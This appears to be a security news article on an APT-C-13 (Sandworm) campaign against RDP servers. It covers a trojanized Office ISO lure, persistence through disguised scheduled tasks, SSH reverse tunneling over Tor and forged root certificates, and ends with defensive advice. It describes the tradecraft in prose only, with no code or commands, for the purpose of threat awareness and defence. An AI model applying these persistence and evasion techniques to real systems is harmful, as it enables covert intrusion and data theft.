Threat Intel - APT Hackers Target RDP Servers for Persistence
Basically, hackers are using tricks to sneak into important computer systems and stay hidden for a long time.
APT-C-13 hackers are targeting RDP servers to deploy malicious payloads. This stealthy campaign poses significant risks to critical infrastructure and government agencies. Organizations must act quickly to protect their networks from these persistent threats.
The Threat
APT-C-13, a notorious state-backed hacking group, is actively targeting Remote Desktop Protocol (RDP) servers. This group, also known as Sandworm, APT44, Seashell Blizzard, and Voodoo Bear, has been conducting cyber operations since at least 2009. Their latest campaign marks a significant shift in strategy, moving from destructive attacks to stealthy, long-term infiltrations aimed at harvesting sensitive intelligence over extended periods.
The hackers are using a disguised ISO image named Microsoft.Office.2025x64.v2025.iso, which is distributed through Telegram channels and software cracking communities. When victims attempt to install what appears to be Microsoft Office, hidden executors launch in the background, initiating the attack chain. This social engineering tactic exploits the trust users have in familiar software names, making it an effective entry point for the attackers.
Who's Behind It
APT-C-13's approach has evolved significantly. Analysts from the 360 Threat Intelligence Center have observed a transition from “instantaneous disruption” to “intelligence-driven persistent parasitism.” This evolution is evident in their use of a modular penetration framework known as the Tambur/Sumbur/Kalambur series. Their operations are designed to remain undetected for months, allowing them to extract sensitive data from within trusted environments.
One confirmed victim was a technician at a Ukrainian state-owned shipbuilding plant, highlighting the campaign's serious implications for critical infrastructure. The attackers have established deep access, often remaining unnoticed until they have achieved their objectives, which can have devastating consequences for organizations.
Tactics & Techniques
The most alarming aspect of this campaign is the attackers' ability to maintain persistence. They achieve this by planting scheduled tasks named “Tambur” and “Protector” in a location that mimics a native Windows component. These tasks run with full administrator privileges, using a hardcoded password to ensure uninterrupted access to the RDP service.
Additionally, the attackers route command-and-control traffic through the Tor network, obscuring their real location. They employ SSH reverse tunneling to map the victim’s RDP port to a remote server, allowing silent logins from anywhere in the world. The Sumbur module further disguises its operations by mimicking legitimate Microsoft Edge updates, while the DemiMur module injects a forged root certificate into the system, rendering malicious payloads trusted by Windows.
Defensive Measures
Organizations must take immediate action to safeguard against these threats. Blocking unauthorized ISO images and third-party activation tools is crucial, as these are primary delivery channels for the attack. Monitoring internal network behavior for signs of tampering, such as unusual scheduled task creation or registry modifications, is essential.
Endpoint security solutions should be kept up to date with regular comprehensive scans. Key institutions must strengthen internal auditing practices and establish specific detection rules targeting anomalous RDP and SSH activity. By implementing these measures, organizations can better protect themselves from long-term intelligence theft and the severe implications of such attacks.
Cyber Security News